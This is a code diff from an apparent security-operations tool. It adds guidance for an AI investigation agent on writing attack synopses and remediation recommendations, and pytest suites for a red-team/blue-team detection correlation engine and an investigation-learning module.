-2. You have TTPs identified (pyramid level 6)
-3. Tactical coverage is reasonable (checked major attack phases)
-4. Timeline is coherent
-5. Scope is understood
+Call complete_investigation(summary, attack_synopsis, recommendations) when:
+1. You have investigated the alert and recorded evidence
+2. You understand what happened (attack type, affected hosts/users)
+3. You can provide recommendations
+
+### Summary Requirements
+
+The **summary** should include:
+- What attack/activity was detected
+- Key findings and affected hosts/users
+- Confidence level
+
+### Attack Synopsis Requirements (CRITICAL)
+
+The **attack_synopsis** is a narrative describing the attack chain. It should:
+- Describe the attack from start to finish in chronological order
+- Include specific hostnames, usernames, IPs, and timestamps
+- Explain how the attacker progressed (what they did first, second, etc.)
+- Connect the dots between evidence pieces
+
+**Good Synopsis Example:**
+```
+"On 2026-01-10 at 14:30 UTC, attacker from IP 10.0.4.186 began password spraying
+against domain accounts. After 47 failed attempts, they successfully authenticated
+as arya.stark at 14:45. Using these credentials, they accessed SYSVOL share on
+DC01 at 14:52 to harvest GPP passwords. At 15:10, they executed DCSync from
+workstation WS-042, extracting the krbtgt hash. Total time from initial access
+to domain compromise: 40 minutes."
+```
+
+**Bad Synopsis Example:**
+```
+"DCSync attack detected." (Too vague, no details)
+```
+
+### Recommendations Requirements (CRITICAL)
+
+The **recommendations** list should include:
+1. **Extract from alert annotations**: The alert's `response` annotation contains expert-written response steps - USE THEM
+2. **Add investigation-specific findings**: Based on what you discovered
+3. **Prioritize by severity**: Critical actions first
+
+**Always check the alert annotations for:**
+- `response`: Contains step-by-step remediation guidance
+- `summary`: Contains concise attack description
+- `description`: Contains detailed attack explanation
+
+Example with all three parameters:
+```
+complete_investigation(
+ summary="Detected DCSync attack. User robb.stark executed replication requests "
+ "from winterfell.north.sevenkingdoms.local. NTLM hashes exfiltrated for "
+ "multiple domain accounts. Confidence: High based on Event 4662 correlation.",
+ attack_synopsis="Initial access occurred via password spray at 14:30 UTC with "
+ "47 failed logons against 12 accounts. Successful authentication "
+ "as robb.stark at 14:45. SYSVOL accessed at 14:52. DCSync executed "
+ "at 15:10 targeting krbtgt and Administrator accounts.",
+ recommendations=[
+ "IMMEDIATE: Reset krbtgt password twice (10 hours apart)",
+ "IMMEDIATE: Reset all compromised account passwords",
+ "Isolate source host winterfell.north.sevenkingdoms.local",
+ "Block source IP at network perimeter",
+ "Hunt for golden ticket usage (Event 4769 with RC4)",
+ "Review all privileged account access in past 24 hours"
+ ]
+)
+```
+
+### Timeline Building (MANDATORY)
+
+You MUST call add_timeline_event() for EVERY significant event discovered:
+- Authentication events (successful and failed)
+- Share access events
+- Privilege escalation events
+- Lateral movement events
+- Data exfiltration indicators
+
+**Even if you only have the alert timestamp**, create a timeline event for it.
Call escalate_investigation() if:
- Active, ongoing attack detected
diff --git a/tests/test_correlation.py b/tests/test_correlation.py
new file mode 100644
index 00000000..8819735e
--- /dev/null
+++ b/tests/test_correlation.py
@@ -0,0 +1,735 @@
+"""Tests for the Red-Blue Correlation Engine."""
+
+import tempfile
+from datetime import datetime, timedelta, timezone
+from pathlib import Path
+
+import pytest
+
+from ares.core.correlation import (
+ BlueTeamDetection,
+ CorrelationMatch,
+ CorrelationReport,
+ DetectionGap,
+ RedBlueCorrelator,
+ RedTeamActivity,
+)
+
+
+@pytest.fixture
+def temp_reports_dir() -> Path:
+ """Create a temporary reports directory."""
+ with tempfile.TemporaryDirectory() as tmpdir:
+ yield Path(tmpdir)
+
+
+@pytest.fixture
+def sample_red_activity() -> RedTeamActivity:
+ """Create a sample red team activity."""
+ return RedTeamActivity(
+ timestamp=datetime(2024, 1, 15, 10, 30, 0, tzinfo=timezone.utc),
+ technique_id="T1059.001",
+ technique_name="PowerShell",
+ action="Executed PowerShell command for reconnaissance",
+ target_ip="192.168.1.100",
+ target_host="server01",
+ credential_used="admin",
+ success=True,
+ metadata={"command": "Get-Process"},
+ )
+
+
+@pytest.fixture
+def sample_blue_detection() -> BlueTeamDetection:
+ """Create a sample blue team detection."""
+ return BlueTeamDetection(
+ timestamp=datetime(2024, 1, 15, 10, 32, 0, tzinfo=timezone.utc),
+ alert_name="Suspicious PowerShell Activity",
+ technique_id="T1059.001",
+ severity="high",
+ target_ip="192.168.1.100",
+ target_host="server01",
+ investigation_id="inv-001",
+ status="completed",
+ evidence_count=5,
+ highest_pyramid_level=3,
+ metadata={"rule_id": "rule-ps-001"},
+ )
+
+
+class TestRedTeamActivity:
+ """Tests for RedTeamActivity dataclass."""
+
+ def test_key_generation(self, sample_red_activity: RedTeamActivity) -> None:
+ """Test unique key generation."""
+ key = sample_red_activity.key
+
+ assert "2024-01-15" in key
+ assert "T1059.001" in key
+ assert "192.168.1.100" in key
+
+ def test_key_uniqueness(self) -> None:
+ """Test that different activities have different keys."""
+ activity1 = RedTeamActivity(
+ timestamp=datetime(2024, 1, 15, 10, 30, 0, tzinfo=timezone.utc),
+ technique_id="T1059.001",
+ technique_name="PowerShell",
+ action="Action 1",
+ target_ip="192.168.1.100",
+ target_host=None,
+ credential_used=None,
+ success=True,
+ )
+ activity2 = RedTeamActivity(
+ timestamp=datetime(2024, 1, 15, 10, 31, 0, tzinfo=timezone.utc),
+ technique_id="T1059.001",
+ technique_name="PowerShell",
+ action="Action 2",
+ target_ip="192.168.1.100",
+ target_host=None,
+ credential_used=None,
+ success=True,
+ )
+
+ assert activity1.key != activity2.key
+
+
+class TestBlueTeamDetection:
+ """Tests for BlueTeamDetection dataclass."""
+
+ def test_key_generation(self, sample_blue_detection: BlueTeamDetection) -> None:
+ """Test unique key generation."""
+ key = sample_blue_detection.key
+
+ assert "2024-01-15" in key
+ assert "T1059.001" in key
+ assert "Suspicious PowerShell Activity" in key
+
+
+class TestCorrelationMatch:
+ """Tests for CorrelationMatch dataclass."""
+
+ def test_match_quality_strong(
+ self,
+ sample_red_activity: RedTeamActivity,
+ sample_blue_detection: BlueTeamDetection,
+ ) -> None:
+ """Test strong match quality classification."""
+ match = CorrelationMatch(
+ red_activity=sample_red_activity,
+ blue_detection=sample_blue_detection,
+ time_delta_seconds=120.0, # 2 minutes
+ technique_match=True,
+ target_match=True,
+ confidence=0.9,
+ )
+
+ assert match.match_quality == "STRONG"
+
+ def test_match_quality_good(
+ self,
+ sample_red_activity: RedTeamActivity,
+ sample_blue_detection: BlueTeamDetection,
+ ) -> None:
+ """Test good match quality classification."""
+ match = CorrelationMatch(
+ red_activity=sample_red_activity,
+ blue_detection=sample_blue_detection,
+ time_delta_seconds=400.0, # ~7 minutes
+ technique_match=True,
+ target_match=False,
+ confidence=0.6,
+ )
+
+ assert match.match_quality == "GOOD"
+
+ def test_match_quality_weak(
+ self,
+ sample_red_activity: RedTeamActivity,
+ sample_blue_detection: BlueTeamDetection,
+ ) -> None:
+ """Test weak match quality classification."""
+ match = CorrelationMatch(
+ red_activity=sample_red_activity,
+ blue_detection=sample_blue_detection,
+ time_delta_seconds=700.0, # ~12 minutes
+ technique_match=True,
+ target_match=False,
+ confidence=0.4,
+ )
+
+ assert match.match_quality == "WEAK"
+
+ def test_match_quality_tenuous(
+ self,
+ sample_red_activity: RedTeamActivity,
+ sample_blue_detection: BlueTeamDetection,
+ ) -> None:
+ """Test tenuous match quality classification."""
+ match = CorrelationMatch(
+ red_activity=sample_red_activity,
+ blue_detection=sample_blue_detection,
+ time_delta_seconds=700.0,
+ technique_match=False,
+ target_match=False,
+ confidence=0.2,
+ )
+
+ assert match.match_quality == "TENUOUS"
+
+
+class TestCorrelationReport:
+ """Tests for CorrelationReport dataclass."""
+
+ def test_to_dict(
+ self,
+ sample_red_activity: RedTeamActivity,
+ sample_blue_detection: BlueTeamDetection,
+ ) -> None:
+ """Test conversion to dictionary."""
+ match = CorrelationMatch(
+ red_activity=sample_red_activity,
+ blue_detection=sample_blue_detection,
+ time_delta_seconds=120.0,
+ technique_match=True,
+ target_match=True,
+ confidence=0.9,
+ )
+
+ gap = DetectionGap(
+ red_activity=sample_red_activity,
+ reason="No alert rule configured",
+ recommended_detection="Add PowerShell monitoring",
+ )
+
+ report = CorrelationReport(
+ analysis_timestamp=datetime.now(timezone.utc),
+ red_operation_id="op-001",
+ time_window_start=datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc),
+ time_window_end=datetime(2024, 1, 15, 11, 0, 0, tzinfo=timezone.utc),
+ total_red_activities=10,
+ total_blue_detections=8,
+ matched_activities=7,
+ undetected_activities=3,
+ false_positive_detections=1,
+ matches=[match],
+ gaps=[gap],
+ false_positives=[sample_blue_detection],
+ detection_rate=0.7,
+ false_positive_rate=0.125,
+ mean_time_to_detect=120.0,
+ technique_coverage={
+ "T1059.001": {"total": 5, "detected": 4, "missed": 1, "detection_rate": 0.8}
+ },
+ )
+
+ data = report.to_dict()
+
+ assert data["red_operation_id"] == "op-001"
+ assert data["summary"]["total_red_activities"] == 10
+ assert data["summary"]["detection_rate"] == "70.0%"
+ assert len(data["matches"]) == 1
+ assert len(data["gaps"]) == 1
+ assert "T1059.001" in data["technique_coverage"]
+
+
+class TestRedBlueCorrelator:
+ """Tests for RedBlueCorrelator."""
+
+ def test_init(self, temp_reports_dir: Path) -> None:
+ """Test correlator initialization."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+
+ assert correlator.reports_dir == temp_reports_dir
+ assert correlator.time_window == timedelta(minutes=30)
+
+ def test_init_custom_time_window(self, temp_reports_dir: Path) -> None:
+ """Test correlator with custom time window."""
+ correlator = RedBlueCorrelator(temp_reports_dir, time_window_minutes=60)
+
+ assert correlator.time_window == timedelta(minutes=60)
+
+ def test_correlate_perfect_match(
+ self,
+ temp_reports_dir: Path,
+ sample_red_activity: RedTeamActivity,
+ sample_blue_detection: BlueTeamDetection,
+ ) -> None:
+ """Test correlation with perfect technique and target match."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+
+ report = correlator.correlate(
+ red_activities=[sample_red_activity],
+ blue_detections=[sample_blue_detection],
+ operation_id="test-op",
+ )
+
+ assert report.total_red_activities == 1
+ assert report.total_blue_detections == 1
+ assert report.matched_activities == 1
+ assert report.undetected_activities == 0
+ assert len(report.matches) == 1
+ assert report.matches[0].technique_match is True
+ assert report.matches[0].target_match is True
+
+ def test_correlate_no_match_outside_time_window(
+ self, temp_reports_dir: Path, sample_red_activity: RedTeamActivity
+ ) -> None:
+ """Test that activities outside time window are not matched."""
+ correlator = RedBlueCorrelator(temp_reports_dir, time_window_minutes=10)
+
+ # Detection 1 hour after activity
+ late_detection = BlueTeamDetection(
+ timestamp=sample_red_activity.timestamp + timedelta(hours=1),
+ alert_name="Late Detection",
+ technique_id="T1059.001",
+ severity="high",
+ target_ip="192.168.1.100",
+ target_host=None,
+ investigation_id="inv-late",
+ status="completed",
+ evidence_count=1,
+ highest_pyramid_level=1,
+ )
+
+ report = correlator.correlate(
+ red_activities=[sample_red_activity],
+ blue_detections=[late_detection],
+ operation_id="test-op",
+ )
+
+ assert report.matched_activities == 0
+ assert report.undetected_activities == 1
+
+ def test_correlate_technique_mismatch(
+ self, temp_reports_dir: Path, sample_red_activity: RedTeamActivity
+ ) -> None:
+ """Test correlation with technique mismatch."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+
+ wrong_technique_detection = BlueTeamDetection(
+ timestamp=sample_red_activity.timestamp + timedelta(minutes=2),
+ alert_name="Different Technique",
+ technique_id="T1003.001", # Different technique
+ severity="high",
+ target_ip="192.168.1.100",
+ target_host=None,
+ investigation_id="inv-001",
+ status="completed",
+ evidence_count=1,
+ highest_pyramid_level=1,
+ )
+
+ report = correlator.correlate(
+ red_activities=[sample_red_activity],
+ blue_detections=[wrong_technique_detection],
+ operation_id="test-op",
+ )
+
+ # Should still match based on target and time proximity
+ assert len(report.matches) == 1
+ assert report.matches[0].technique_match is False
+ assert report.matches[0].target_match is True
+
+ def test_correlate_multiple_activities(self, temp_reports_dir: Path) -> None:
+ """Test correlation with multiple activities and detections."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+ base_time = datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc)
+
+ # Use different target IPs to prevent cross-matching via target
+ red_activities = [
+ RedTeamActivity(
+ timestamp=base_time + timedelta(minutes=i * 10),
+ technique_id=f"T100{i}",
+ technique_name=f"Technique {i}",
+ action=f"Action {i}",
+ target_ip=f"192.168.1.{100 + i}", # Different IPs
+ target_host=None,
+ credential_used=None,
+ success=True,
+ )
+ for i in range(5)
+ ]
+
+ # Only detect 3 of 5 activities (matching technique and target)
+ blue_detections = [
+ BlueTeamDetection(
+ timestamp=base_time + timedelta(minutes=i * 10 + 2),
+ alert_name=f"Alert {i}",
+ technique_id=f"T100{i}",
+ severity="high",
+ target_ip=f"192.168.1.{100 + i}", # Matching IPs
+ target_host=None,
+ investigation_id=f"inv-{i}",
+ status="completed",
+ evidence_count=1,
+ highest_pyramid_level=1,
+ )
+ for i in [0, 2, 4] # Only detect activities 0, 2, 4
+ ]
+
+ report = correlator.correlate(
+ red_activities=red_activities,
+ blue_detections=blue_detections,
+ operation_id="test-op",
+ )
+
+ assert report.total_red_activities == 5
+ assert report.total_blue_detections == 3
+ assert report.matched_activities == 3
+ assert report.undetected_activities == 2
+ assert report.detection_rate == 0.6
+
+ def test_correlate_empty_activities(self, temp_reports_dir: Path) -> None:
+ """Test correlation with no activities."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+
+ report = correlator.correlate(
+ red_activities=[],
+ blue_detections=[],
+ operation_id="empty-op",
+ )
+
+ assert report.total_red_activities == 0
+ assert report.detection_rate == 0.0
+
+ def test_correlate_identifies_false_positives(
+ self, temp_reports_dir: Path, sample_red_activity: RedTeamActivity
+ ) -> None:
+ """Test that unmatched detections are identified as false positives."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+
+ # Detection without corresponding red activity
+ unrelated_detection = BlueTeamDetection(
+ timestamp=sample_red_activity.timestamp + timedelta(minutes=5),
+ alert_name="Unrelated Alert",
+ technique_id="T9999", # No matching red activity
+ severity="low",
+ target_ip="10.0.0.1", # Different target
+ target_host=None,
+ investigation_id="inv-fp",
+ status="completed",
+ evidence_count=0,
+ highest_pyramid_level=0,
+ )
+
+ report = correlator.correlate(
+ red_activities=[sample_red_activity],
+ blue_detections=[
+ BlueTeamDetection(
+ timestamp=sample_red_activity.timestamp + timedelta(minutes=2),
+ alert_name="Matching Alert",
+ technique_id="T1059.001",
+ severity="high",
+ target_ip="192.168.1.100",
+ target_host=None,
+ investigation_id="inv-001",
+ status="completed",
+ evidence_count=1,
+ highest_pyramid_level=1,
+ ),
+ unrelated_detection,
+ ],
+ operation_id="test-op",
+ )
+
+ assert len(report.false_positives) == 1
+ assert report.false_positives[0].alert_name == "Unrelated Alert"
+
+ def test_technique_coverage_calculation(self, temp_reports_dir: Path) -> None:
+ """Test technique coverage calculation."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+ base_time = datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc)
+
+ # Create activities with DIFFERENT techniques and targets for clear matching
+ # This ensures each activity can only match its corresponding detection
+ red_activities = [
+ RedTeamActivity(
+ timestamp=base_time + timedelta(minutes=i * 10),
+ technique_id=f"T105{i}", # Different technique per activity
+ technique_name=f"Technique {i}",
+ action=f"Action {i}",
+ target_ip=f"192.168.1.{100 + i}", # Different targets
+ target_host=None,
+ credential_used=None,
+ success=True,
+ )
+ for i in range(4)
+ ]
+
+ # Only detect 3 of 4 (activities 0, 1, 2 but not 3)
+ blue_detections = [
+ BlueTeamDetection(
+ timestamp=base_time + timedelta(minutes=i * 10, seconds=30),
+ alert_name=f"Alert {i}",
+ technique_id=f"T105{i}", # Matching technique
+ severity="high",
+ target_ip=f"192.168.1.{100 + i}", # Matching targets
+ target_host=None,
+ investigation_id=f"inv-{i}",
+ status="completed",
+ evidence_count=1,
+ highest_pyramid_level=1,
+ )
+ for i in range(3) # Only first 3 activities get detected
+ ]
+
+ report = correlator.correlate(
+ red_activities=red_activities,
+ blue_detections=blue_detections,
+ operation_id="test-op",
+ )
+
+ # Should have coverage data for all 4 techniques
+ assert len(report.technique_coverage) == 4
+ # 3 techniques should be detected (T1050, T1051, T1052)
+ # 1 technique should be missed (T1053)
+ detected_count = sum(1 for t in report.technique_coverage.values() if t["detected"] > 0)
+ missed_count = sum(1 for t in report.technique_coverage.values() if t["missed"] > 0)
+ assert detected_count == 3
+ assert missed_count == 1
+ assert report.matched_activities == 3
+ assert report.undetected_activities == 1
+
+ def test_mean_time_to_detect(
+ self,
+ temp_reports_dir: Path,
+ ) -> None:
+ """Test mean time to detect calculation."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+ base_time = datetime(2024, 1, 15, 10, 0, 0, tzinfo=timezone.utc)
+
+ red_activities = [
+ RedTeamActivity(
+ timestamp=base_time,
+ technique_id="T1059.001",
+ technique_name="PowerShell",
+ action="Action 1",
+ target_ip="192.168.1.100",
+ target_host=None,
+ credential_used=None,
+ success=True,
+ ),
+ RedTeamActivity(
+ timestamp=base_time + timedelta(minutes=10),
+ technique_id="T1059.002",
+ technique_name="Script",
+ action="Action 2",
+ target_ip="192.168.1.100",
+ target_host=None,
+ credential_used=None,
+ success=True,
+ ),
+ ]
+
+ blue_detections = [
+ BlueTeamDetection(
+ timestamp=base_time + timedelta(seconds=60), # 60s after
+ alert_name="Alert 1",
+ technique_id="T1059.001",
+ severity="high",
+ target_ip="192.168.1.100",
+ target_host=None,
+ investigation_id="inv-1",
+ status="completed",
+ evidence_count=1,
+ highest_pyramid_level=1,
+ ),
+ BlueTeamDetection(
+ timestamp=base_time + timedelta(minutes=10, seconds=120), # 120s after
+ alert_name="Alert 2",
+ technique_id="T1059.002",
+ severity="high",
+ target_ip="192.168.1.100",
+ target_host=None,
+ investigation_id="inv-2",
+ status="completed",
+ evidence_count=1,
+ highest_pyramid_level=1,
+ ),
+ ]
+
+ report = correlator.correlate(
+ red_activities=red_activities,
+ blue_detections=blue_detections,
+ operation_id="test-op",
+ )
+
+ # Mean of 60s and 120s = 90s
+ assert report.mean_time_to_detect == 90.0
+
+ def test_generate_report_markdown(
+ self,
+ temp_reports_dir: Path,
+ sample_red_activity: RedTeamActivity,
+ sample_blue_detection: BlueTeamDetection,
+ ) -> None:
+ """Test markdown report generation."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+
+ report = correlator.correlate(
+ red_activities=[sample_red_activity],
+ blue_detections=[sample_blue_detection],
+ operation_id="test-op",
+ )
+
+ markdown = correlator.generate_report_markdown(report)
+
+ assert "# Red-Blue Correlation Report" in markdown
+ assert "Executive Summary" in markdown
+ assert "test-op" in markdown
+ assert "Detection Rate" in markdown
+
+ def test_load_red_team_report_basic(self, temp_reports_dir: Path) -> None:
+ """Test loading a basic red team report."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+
+ # Create a sample red team report
+ report_content = """# Red Team Operation Report
+
+**Operation ID**: op-test-001
+**Target**: 192.168.1.100
+**Started**: 2024-01-15 10:00:00 UTC
+
+### Hosts (3)
+Found 3 hosts during scanning.
+
+### Credentials (2)
+**admin**
+Source: password guessing
+
+**backup**
+Source: credential dumping
+
+### Timeline of Key Events
+| Timestamp | Event | Technique |
+|-----------|-------|-----------|
+| 2024-01-15T10:05:00Z | Initial access | T1078 |
+| 2024-01-15T10:10:00Z | Privilege escalation | T1068 |
+
+**Domain Admin Access**: ✓
+**Golden Ticket**: ✓
+"""
+ report_path = temp_reports_dir / "redteam-op-test-001.md"
+ report_path.write_text(report_content)
+
+ operation_id, activities = correlator.load_red_team_report(report_path)
+
+ assert operation_id == "op-test-001"
+ assert len(activities) > 0
+
+ # Check for network discovery activity
+ discovery = next((a for a in activities if a.technique_id == "T1046"), None)
+ assert discovery is not None
+ assert "3 host" in discovery.action
+
+ def test_load_investigation_report(self, temp_reports_dir: Path) -> None:
+ """Test loading an investigation report."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+
+ report_content = """# Investigation Report
+
+**Investigation ID:** `inv-20240115-001`
+
+| Field | Value |
+|-------|-------|
+| Alert Name | Suspicious PowerShell Activity |
+| Severity | high |
+| Status | completed |
+
+Alert payload contains:
+"startsAt": "2024-01-15T10:30:00Z"
+
+Target IP: 192.168.1.100
+
+Technique: T1059.001
+
+**Evidence Collected:** 5
+**Highest Pyramid Level:** 3
+"""
+ report_path = temp_reports_dir / "investigation_20240115_103000.md"
+ report_path.write_text(report_content)
+
+ detection = correlator.load_investigation_report(report_path)
+
+ assert detection is not None
+ assert detection.investigation_id == "inv-20240115-001"
+ assert detection.alert_name == "Suspicious PowerShell Activity"
+ assert detection.severity == "high"
+ assert detection.technique_id == "T1059.001"
+ assert detection.evidence_count == 5
+ assert detection.highest_pyramid_level == 3
+
+ def test_load_investigation_report_skips_no_data(self, temp_reports_dir: Path) -> None:
+ """Test that DatasourceNoData reports are skipped."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+
+ report_path = temp_reports_dir / "investigation_DatasourceNoData_20240115.md"
+ report_path.write_text("Some content")
+
+ detection = correlator.load_investigation_report(report_path)
+
+ assert detection is None
+
+ def test_load_all_reports(self, temp_reports_dir: Path) -> None:
+ """Test loading all reports from directory."""
+ correlator = RedBlueCorrelator(temp_reports_dir)
+
+ # Create red team report
+ red_report = temp_reports_dir / "redteam-op001.md"
+ red_report.write_text("""# Red Team Report
+**Operation ID**: op001
+**Target**: 192.168.1.1
+**Started**: 2024-01-15 10:00:00 UTC
+### Hosts (1)
+### Credentials (0)
+""")
+
+ # Create investigation report
+ inv_report = temp_reports_dir / "investigation_20240115.md"
+ inv_report.write_text("""# Investigation
+**Investigation ID:** `inv-001`
+| Alert Name | Test Alert |
+| Severity | high |
+| Status | completed |
+"startsAt": "2024-01-15T10:30:00Z"
+**Evidence Collected:** 1
+**Highest Pyramid Level:** 1
+""")
+
+ # Create non-report file (should be ignored)
+ other_file = temp_reports_dir / "readme.md"
+ other_file.write_text("# README")
+
+ red_reports, blue_detections = correlator.load_all_reports()
+
+ assert len(red_reports) == 1
+ assert red_reports[0][0] == "op001"
+ assert len(blue_detections) >= 0 # May or may not parse depending on format
+
+
+class TestDetectionGap:
+ """Tests for DetectionGap dataclass."""
+
+ def test_gap_with_recommendation(self, sample_red_activity: RedTeamActivity) -> None:
+ """Test detection gap with recommendation."""
+ gap = DetectionGap(
+ red_activity=sample_red_activity,
+ reason="No alert rule configured",
+ recommended_detection="Add PowerShell monitoring rule",
+ mitre_data_sources=["Process: Process Creation", "Script: Script Execution"],
+ )
+
+ assert gap.reason == "No alert rule configured"
+ assert gap.recommended_detection == "Add PowerShell monitoring rule"
+ assert len(gap.mitre_data_sources) == 2
+
+ def test_gap_without_recommendation(self, sample_red_activity: RedTeamActivity) -> None:
+ """Test detection gap without recommendation."""
+ gap = DetectionGap(
+ red_activity=sample_red_activity,
+ reason="Unknown technique",
+ )
+
+ assert gap.recommended_detection is None
+ assert gap.mitre_data_sources == []
diff --git a/tests/test_learning.py b/tests/test_learning.py
new file mode 100644
index 00000000..7262e8e4
--- /dev/null
+++ b/tests/test_learning.py
@@ -0,0 +1,529 @@
+"""Tests for the Learning Tools module."""
+
+import tempfile
+from datetime import datetime, timedelta, timezone
+from pathlib import Path
+
+import pytest
+
+from ares.core.persistence import InvestigationStore, StoredInvestigation
+from ares.tools.blue.learning import LearningTools
+
+
+@pytest.fixture
+def temp_db() -> Path:
+ """Create a temporary database file."""
+ with tempfile.TemporaryDirectory() as tmpdir:
+ yield Path(tmpdir) / "test_learning.db"
+
+
+@pytest.fixture
+def store(temp_db: Path) -> InvestigationStore:
+ """Create a fresh investigation store."""
+ return InvestigationStore(temp_db)
+
+
+@pytest.fixture
+def learning_tools(store: InvestigationStore) -> LearningTools:
+ """Create learning tools with test store."""
+ return LearningTools(store=store)
+
+
+@pytest.fixture
+def populated_store(store: InvestigationStore) -> InvestigationStore:
+ """Create a store with sample investigation data."""
+ now = datetime.now(timezone.utc)
+
+ # Create several investigations
+ investigations = [
+ StoredInvestigation(
+ investigation_id=f"inv-{i}",
+ alert_name="HighCPUUsage",
+ alert_fingerprint="rule-cpu-001",
+ severity="warning",
+ technique_id="T1059.001",
+ technique_name="PowerShell",
+ started_at=now - timedelta(hours=i),
+ completed_at=now - timedelta(hours=i) + timedelta(minutes=10),
+ duration_seconds=600.0,
+ status="completed",
+ evidence_count=i + 1,
+ highest_pyramid_level=min(i, 4),
+ techniques_identified=["T1059.001"],
+ queries_executed=[{"query": "{job='windows'}", "result_count": i}],
+ query_success_rate=0.7,
+ effective_queries=["{job='windows'} |= 'powershell'"],
+ is_true_positive=i % 2 == 0, # Alternating true/false
+ )
+ for i in range(5)
+ ]
+
+ # Add a different alert type
+ investigations.append(
+ StoredInvestigation(
+ investigation_id="inv-different",
+ alert_name="SuspiciousLogin",
+ alert_fingerprint="rule-login-001",
+ severity="high",
+ technique_id="T1078",
+ technique_name="Valid Accounts",
+ started_at=now - timedelta(hours=1),
+ completed_at=now - timedelta(minutes=50),
+ duration_seconds=600.0,
+ status="completed",
+ evidence_count=3,
+ highest_pyramid_level=2,
+ techniques_identified=["T1078"],
+ queries_executed=[{"query": "{job='auth'}", "result_count": 5}],
+ query_success_rate=0.8,
+ effective_queries=["{job='auth'} |= 'failed'"],
+ is_true_positive=True,
+ )
+ )
+
+ for inv in investigations:
+ store.store_investigation(inv)
+
+ # Add query effectiveness data
+ for _ in range(5):
+ store.update_query_effectiveness(
+ query_pattern="{job='windows'} |= 'powershell'",
+ successful=True,
+ produced_evidence=True,
+ alert_type="HighCPUUsage",
+ )
+ store.update_query_effectiveness(
+ query_pattern="{job='auth'} |= 'failed'",
+ successful=True,
+ produced_evidence=True,
+ alert_type="SuspiciousLogin",
+ )
+
+ return store
+
+
+@pytest.fixture
+def populated_learning_tools(populated_store: InvestigationStore) -> LearningTools:
+ """Create learning tools with populated store."""
+ return LearningTools(store=populated_store)
+
+
+class TestLearningToolsInit:
+ """Tests for LearningTools initialization."""
+
+ def test_init_with_store(self, store: InvestigationStore) -> None:
+ """Test initialization with provided store."""
+ tools = LearningTools(store=store)
+
+ assert tools.store is store
+
+ def test_init_without_store(self) -> None:
+ """Test initialization without store uses global."""
+ tools = LearningTools()
+
+ assert tools.store is None
+ # Accessing get_store() should get/create global store
+ # (but we won't test that to avoid side effects)
+
+ def test_get_store_returns_provided_store(self, store: InvestigationStore) -> None:
+ """Test that get_store() returns provided store."""
+ tools = LearningTools(store=store)
+
+ assert tools.get_store() is store
+
+
+class TestFindSimilarInvestigations:
+ """Tests for find_similar_investigations tool."""
+
+ @pytest.mark.asyncio
+ async def test_find_similar_no_results(self, learning_tools: LearningTools) -> None:
+ """Test finding similar investigations with empty store."""
+ result = await learning_tools.find_similar_investigations(alert_name="NonexistentAlert")
+
+ assert result["found"] is False
+ assert result["investigations"] == []
+ assert "No similar investigations" in result["message"]
+
+ @pytest.mark.asyncio
+ async def test_find_similar_by_alert_name(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test finding similar investigations by alert name."""
+ result = await populated_learning_tools.find_similar_investigations(
+ alert_name="HighCPUUsage"
+ )
+
+ assert result["found"] is True
+ assert result["count"] >= 1
+ assert len(result["investigations"]) >= 1
+
+ # Check investigation structure
+ inv = result["investigations"][0]
+ assert "investigation_id" in inv
+ assert "alert_name" in inv
+ assert "similarity_score" in inv
+ assert "matching_factors" in inv
+ assert "outcome" in inv
+
+ @pytest.mark.asyncio
+ async def test_find_similar_by_technique(self, populated_learning_tools: LearningTools) -> None:
+ """Test finding similar investigations by technique."""
+ result = await populated_learning_tools.find_similar_investigations(
+ technique_id="T1059.001"
+ )
+
+ assert result["found"] is True
+ assert result["count"] >= 1
+
+ # All results should have the matching technique
+ for inv in result["investigations"]:
+ assert inv["technique_id"] == "T1059.001"
+
+ @pytest.mark.asyncio
+ async def test_find_similar_returns_summary(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test that find_similar returns summary statistics."""
+ result = await populated_learning_tools.find_similar_investigations(
+ alert_name="HighCPUUsage"
+ )
+
+ assert "summary" in result
+ assert "completion_rate" in result["summary"]
+ assert "avg_evidence_count" in result["summary"]
+ assert "true_positives" in result["summary"]
+ assert "false_positives" in result["summary"]
+
+ @pytest.mark.asyncio
+ async def test_find_similar_returns_guidance(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test that find_similar returns investigation guidance."""
+ result = await populated_learning_tools.find_similar_investigations(
+ alert_name="HighCPUUsage"
+ )
+
+ assert "guidance" in result
+ assert isinstance(result["guidance"], str)
+
+ @pytest.mark.asyncio
+ async def test_find_similar_respects_limit(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test that find_similar respects the limit parameter."""
+ result = await populated_learning_tools.find_similar_investigations(
+ alert_name="HighCPUUsage",
+ limit=2,
+ )
+
+ assert len(result["investigations"]) <= 2
+
+ @pytest.mark.asyncio
+ async def test_find_similar_includes_effective_queries(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test that results include effective queries."""
+ result = await populated_learning_tools.find_similar_investigations(
+ alert_name="HighCPUUsage"
+ )
+
+ # At least one investigation should have effective queries
+ has_queries = any(inv.get("effective_queries") for inv in result["investigations"])
+ assert has_queries or result["count"] == 0
+
+
+class TestGetEffectiveQueries:
+ """Tests for get_effective_queries tool."""
+
+ @pytest.mark.asyncio
+ async def test_get_effective_no_data(self, learning_tools: LearningTools) -> None:
+ """Test getting effective queries with no data."""
+ result = await learning_tools.get_effective_queries()
+
+ assert result["found"] is False
+ assert result["queries"] == []
+ assert "No query effectiveness data" in result["message"]
+
+ @pytest.mark.asyncio
+ async def test_get_effective_queries_returns_results(
+ self, populated_learning_tools: LearningTools
+ ) -> None:
+ """Test getting effective queries with data."""
+ result = await populated_learning_tools.get_effective_queries()
+
+ assert result["found"] is True
